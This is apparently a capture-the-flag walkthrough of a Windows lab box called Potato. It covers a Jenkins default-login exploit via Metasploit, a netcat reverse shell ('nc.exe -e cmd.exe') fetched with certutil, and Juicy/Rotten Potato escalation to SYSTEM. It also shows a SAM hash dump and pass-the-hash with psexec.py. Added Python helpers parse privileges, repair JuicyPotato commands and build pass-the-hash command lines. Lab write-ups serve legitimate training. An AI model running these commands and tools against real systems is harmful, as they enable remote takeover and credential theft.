NOTICE (SPOILER!): if you would like to solve it by yourself, don't read any further.
Today let's play Potato at https://www.cyberseclabs.co.uk/labs/beginner-labs

Step 1: Enumeration

sudo nmap -O -A -p-
kali@kali:~/cyberseclabs$ nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 10:33 EDT
Nmap scan report for
Host is up (0.10s latency).
Not shown: 990 closed ports
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds


Port 8080 turns out to be a Jenkins login page. Let's try some default credentials, starting with the good old admin:admin… and it works.


Step 2: Exploitation

Browsing around the console and clicking through the menus, I had no idea what I was looking for until I spotted the Script Console, and that started to stir up some evil thoughts on how to exploit this thing. The Script Console runs arbitrary Groovy on the Jenkins master, under whatever account the Jenkins service runs as, so anyone who can reach it as admin has code execution on the box. A bit of googling turned up a Metasploit module that drives exactly this. The same thing can be done manually, without Metasploit's spoon feeding, by pasting Groovy into the console that calls out to cmd.exe and runs whatever commands you want.

Exploit: https://www.rapid7.com/db/modules/exploit/multi/http/jenkins_script_console

Let’s now fire up Metasploit from our terminal and use the exploit module following the commands in order:

use exploit/multi/http/jenkins_script_console
set RPORT 8080
set TARGETURI /script/
set USERNAME admin
set PASSWORD admin

By default this module uses a reverse_https payload for the connection back. I switched to reverse_tcp for consistency with the rest of my setup:

set payload windows/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT 7777

Running exploit gives us back a Meterpreter session. I typed shell to drop into a regular Windows command prompt and grab the first flag:

C:\Users\ben\Desktop>type access.txt
type access.txt

Step 3: Post Exploitation

Privilege escalation time. I ran whoami /priv to see whether this box was a candidate for the Juicy Potato exploit:

C:\Users\ben\Desktop>whoami /priv
whoami /priv


Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


SeImpersonatePrivilege is Enabled. That is the one the Potato family needs: the attack coerces a COM server that runs as SYSTEM into authenticating to a listener we control, and this privilege lets our process impersonate the resulting SYSTEM token and spawn a new process with it. This is the famous Juicy Potato attack. Two caveats before getting excited: SeAssignPrimaryTokenPrivilege works just as well, and Juicy Potato only works up to Windows Server 2016 / Windows 10 1803; on later builds Microsoft changed the DCOM activation behaviour it relies on and you need one of the newer Potato variants instead.
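Since the whole privilege-escalation decision hinges on this one check, here is a small triage helper (an added example, not part of the original write-up) that parses whoami /priv output and reports whether the token holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. The sample input is constructed from the output above.

```python
import re

# Privileges the Potato family (Rotten/Juicy/Rogue Potato) needs in order to
# turn a captured SYSTEM token into a SYSTEM process.
POTATO_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed sample input, copied from the whoami /priv run in this write-up.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One data row: privilege name, free-text description, state.
PRIV_LINE = re.compile(r"^(Se\w+?Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Map privilege name -> True if Enabled, False if Disabled.

    Header and separator lines never start with 'Se...Privilege', so they
    are skipped without any special-casing.
    """
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3) == "Enabled"
    return privs


def potato_candidates(privs):
    """Return the Potato-relevant privileges the token holds, sorted.

    'Disabled' still counts: whoami /priv lists every privilege the token
    holds, and a held-but-disabled privilege can be switched on with
    AdjustTokenPrivileges before running the attack.
    """
    return sorted(p for p in privs if p in POTATO_PRIVS)


def triage(text):
    """One-line verdict for a whoami /priv dump."""
    privs = parse_privileges(text)
    hits = potato_candidates(privs)
    if not hits:
        return "no impersonation privilege: Potato attacks will not work here"
    state = ", ".join(
        f"{p} ({'Enabled' if privs[p] else 'Disabled'})" for p in hits
    )
    return f"Potato candidate: {state}"


if __name__ == "__main__":
    print(triage(SAMPLE_WHOAMI_PRIV))
```

Paste the output of whoami /priv from the target into SAMPLE_WHOAMI_PRIV (or read it from a file) and the verdict tells you whether it is worth uploading a Potato binary at all.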

I found a Juicy Potato exploit module for Metasploit. While still in the basic command shell, press Ctrl-Z to background the session, and hit Y if it asks you to background it.

We are now dropped back to the main Metasploit prompt, and can verify the sessions running in the background with the sessions command.

Now load the Juicy Potato module. Because it is a local exploit it also needs SESSION set to the id of the backgrounded Meterpreter session:

use exploit/windows/local/ms16_075_reflection_juicy
set LHOST <your ip>

Sadly, not working for me.

So, the manual route. We first transfer the JuicyPotato binary to the victim machine (you can get it from the JuicyPotato GitHub repo). We also transfer nc.exe (Netcat for Windows); certutil does the download for us and has the advantage of being present on every Windows box:

c:\users\ben>certutil -urlcache -split -f nc.exe

JuicyPotato also needs a CLSID as an argument: the class id of a COM server that runs as SYSTEM on the target, which differs per OS version. The JuicyPotato GitHub repo keeps a list of working CLSIDs for each Windows version. Using the systeminfo command we can see that this machine is running Windows Server 2012, so pick one from that list.

Next, we create a batch file with the following contents (our own listener address goes between cmd.exe and the port):

echo nc.exe -e cmd.exe 1337 > rev.bat

When rev.bat runs it launches nc.exe, which connects back to the listener on our machine on port 1337 and hands it a cmd.exe. One thing to watch: the batch file references nc.exe by bare name, so it is only found if it sits in the working directory of the process JuicyPotato spawns or somewhere on PATH; a full path is safer.

Now we use JuicyPotato. Before that, start a netcat listener on port 1337 on our local machine so rev.bat has something to connect to. Running JuicyPotato:

c:\puck\juicy.exe -p c:\Users\ben\rev.bat -t * -l 6666 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}


  • -p : program to launch (our rev.bat)
  • -t : which API to create the process with: t = CreateProcessWithTokenW, u = CreateProcessAsUser, * = try both
  • -l : port the local COM listener binds to; any free port works
  • -c : CLSID of the SYSTEM COM server to abuse (defaults to BITS if omitted)

Once this completes, we should get a shell back on our listener as NT AUTHORITY\SYSTEM.

Again, not for me:

c:\puck>juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f701a140aa-86ac-db1cbf673334}
juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f701a140aa-86ac-db1cbf673334}
Testing {e60687f701a140aa-86ac-db1cbf673334} 6666
COM -> recv failed with error: 10038
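Because the two Juicy Potato command lines on this page disagree about the CLSID (dash look-alikes from web rendering in one, hyphens dropped in the other), here is a pre-flight check (an added example, not from the write-up or the JuicyPotato project) that parses a juicy.exe command line, validates the mandatory -t/-p/-l flags, and repairs the CLSID to its canonical {8-4-4-4-12} form whenever all 32 hex digits survive. The command lines in the test are constructed after the ones above.

```python
import re

# Canonical CLSID: 8-4-4-4-12 hex groups; braces optional on input.
GUID_RE = re.compile(
    r"^\{?[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}?$"
)

# Dash look-alikes that web/blog rendering tends to substitute for '-'.
DASH_LOOKALIKES = str.maketrans({c: "-" for c in "\u2010\u2011\u2012\u2013\u2014\u2212"})


def normalize_clsid(raw):
    """Return the CLSID as {8-4-4-4-12} lowercase, or None if it cannot be a GUID.

    A GUID is exactly 32 hex digits, so a value with mangled or missing
    hyphens can be repaired unambiguously as long as all 32 digits survive.
    """
    s = raw.strip().translate(DASH_LOOKALIKES).lower()
    if GUID_RE.match(s):
        return "{" + s.strip("{}") + "}"
    digits = s.strip("{}").replace("-", "")
    if re.fullmatch(r"[0-9a-f]{32}", digits):
        return "{%s-%s-%s-%s-%s}" % (
            digits[:8], digits[8:12], digits[12:16], digits[16:20], digits[20:]
        )
    return None


def parse_juicy_args(cmdline):
    """Tokenise 'juicy.exe -p prog -t * -l port -c {clsid}' into {flag: value}."""
    toks = cmdline.split()
    args = {"exe": toks[0]}
    i = 1
    while i < len(toks):
        # JuicyPotato flags are single letters, each followed by one value.
        if toks[i].startswith("-") and len(toks[i]) == 2 and i + 1 < len(toks):
            args[toks[i][1]] = toks[i + 1]
            i += 2
        else:
            i += 1
    return args


def check_juicy_cmd(cmdline):
    """Return (findings, fixed_cmdline) for a JuicyPotato invocation.

    findings lists human-readable problems (empty when the command looks
    sane); fixed_cmdline has the CLSID rewritten in canonical form where
    that was possible, and is the original otherwise.
    """
    args = parse_juicy_args(cmdline)
    findings = []
    fixed = cmdline
    # -t, -p and -l are mandatory per the JuicyPotato usage text; -c defaults to BITS.
    for flag in ("t", "p", "l"):
        if flag not in args:
            findings.append(f"missing -{flag}")
    if "c" in args:
        clsid = normalize_clsid(args["c"])
        if clsid is None:
            findings.append(f"-c {args['c']}: not a GUID (need 32 hex digits as 8-4-4-4-12)")
        elif clsid != args["c"].lower():
            findings.append(f"-c {args['c']}: malformed, canonical form is {clsid}")
            fixed = cmdline.replace(args["c"], clsid)
    if "l" in args and not (args["l"].isdigit() and 1 <= int(args["l"]) <= 65535):
        findings.append(f"-l {args['l']}: not a valid TCP port")
    if args.get("t", "*") not in ("t", "u", "*"):
        findings.append(f"-t {args['t']}: must be t, u or *")
    return findings, fixed


if __name__ == "__main__":
    for cmd in (
        r"c:\puck\juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f701a140aa-86ac-db1cbf673334}",
        r"c:\puck\juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}",
    ):
        problems, repaired = check_juicy_cmd(cmd)
        print(problems or "ok", "->", repaired)
```

This only checks the shape of the command. Whether the CLSID actually belongs to a COM server that runs as SYSTEM on this OS build still comes from the per-version list in the JuicyPotato repo, or from running juicy.exe with -z, which only tests the CLSID and prints the token's user.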

Before blaming the tool, look at the CLSID as typed: {e60687f701a140aa-86ac-db1cbf673334} has lost the hyphens after the first two groups, and a CLSID has to be 32 hex digits in 8-4-4-4-12 form. For the record, 10038 is Winsock's WSAENOTSOCK ("socket operation on nonsocket"). Rather than debug further, let's go Rotten. RottenPotato.exe pulls the same NTLM-to-local-COM trick against the BITS service and ends up holding a SYSTEM impersonation token in its own process; since that process runs as our user, Meterpreter's incognito extension can find and impersonate the token. The "No delegation token available" warning is expected, an impersonation token is all we need here. Upload it, load incognito, run it, impersonate:

meterpreter > upload /tmp/rottenpotato.exe .
[*] uploading : /tmp/rottenpotato.exe -> .
[*] uploaded : /tmp/rottenpotato.exe -> .\rottenpotato.exe
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > execute -Hc -f rottenpotato.exe
Process 952 created.
Channel 3 created.
meterpreter > execute -Hc -f rottenpotato.exe
Process 1952 created.
Channel 4 created.
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

 Volume in drive C has no label.
 Volume Serial Number is 7863-44CF

 Directory of c:\Users\Administrator\Desktop

05/16/2020  01:26 PM    <DIR>          .
05/16/2020  01:26 PM    <DIR>          ..
05/19/2020  11:54 AM                32 system.txt
               1 File(s)             32 bytes
               2 Dir(s)   8,087,158,784 bytes free

type system.txt
c:\Users\Administrator\Desktop>^Z
Background channel 5? [y/N] y
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223:::
ben:1009:aad3b435b51404eeaad3b435b51404ee:e549e5d2b2bf452ba959520eb82bdeeb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >

hashdump reads the SAM, which only works now that we impersonate SYSTEM. The LM field is the empty-LM placeholder on every account, but the NT hash alone is enough: Impacket's psexec.py can pass it straight over SMB, no cracking needed.
kali@kali:~/cyberseclabs$ python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223 ad
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file fJyPgVRp.exe
[*] Opening SVCManager on
[*] Creating service srVS on
[*] Starting service srVS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname &&whoami
nt authority\system
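psexec.py with -hashes never needs the cleartext password, because NTLM authentication over SMB works directly from the NT hash. The helper below (an added example, not from the write-up or from Impacket) parses hashdump's pwdump-format lines, flags the two well-known sentinel hashes (empty LM placeholder, empty-password NT hash), and builds the psexec.py invocation. The sample lines are the ones dumped above; the target host 10.10.10.10 is a placeholder, not the lab's address.

```python
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # placeholder: no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# Constructed sample: the three lines Meterpreter's hashdump printed above.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223:::
ben:1009:aad3b435b51404eeaad3b435b51404ee:e549e5d2b2bf452ba959520eb82bdeeb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

# pwdump format: user:RID:LM:NT:::
PWDUMP_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):")


def parse_hashdump(text):
    """Parse pwdump lines into dicts with the hashes and a few derived flags."""
    rows = []
    for line in text.splitlines():
        m = PWDUMP_LINE.match(line.strip())
        if not m:
            continue  # prompts, blank lines, anything that is not a hash row
        user, rid = m.group(1), int(m.group(2))
        lm, nt = m.group(3).lower(), m.group(4).lower()
        rows.append({
            "user": user, "rid": rid, "lm": lm, "nt": nt,
            "lm_stored": lm != EMPTY_LM,       # a real LM hash is a weak, crackable legacy hash
            "empty_password": nt == EMPTY_NT,  # blank password, typical of a disabled Guest
            "builtin_admin": rid == 500,       # RID 500 is always the built-in Administrator
        })
    return rows


def pth_targets(rows):
    """user -> Impacket '-hashes LM:NT' value for every account worth passing."""
    return {r["user"]: f"{r['lm']}:{r['nt']}" for r in rows if not r["empty_password"]}


def psexec_cmdline(user, host, rows):
    """Build the psexec.py pass-the-hash invocation for `user` against `host`."""
    targets = pth_targets(rows)
    if user not in targets:
        raise ValueError(f"no usable NT hash for {user}")
    return f"psexec.py -hashes {targets[user]} {user}@{host}"


if __name__ == "__main__":
    rows = parse_hashdump(SAMPLE_HASHDUMP)
    for r in rows:
        print(f"{r['user']:<14} rid={r['rid']:<5} empty_pw={r['empty_password']} admin={r['builtin_admin']}")
    # 10.10.10.10 is an assumed placeholder for the target address.
    print(psexec_cmdline("Administrator", "10.10.10.10", rows))
```

The RID 500 flag matters for what comes next: the built-in Administrator is exempt from UAC's remote token filtering, so pass-the-hash over SMB gives a full admin shell, whereas other local admin accounts (ben, if it were one) are blocked for remote admin unless LocalAccountTokenFilterPolicy is set to 1 on the target.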


Author – Puckiestyle
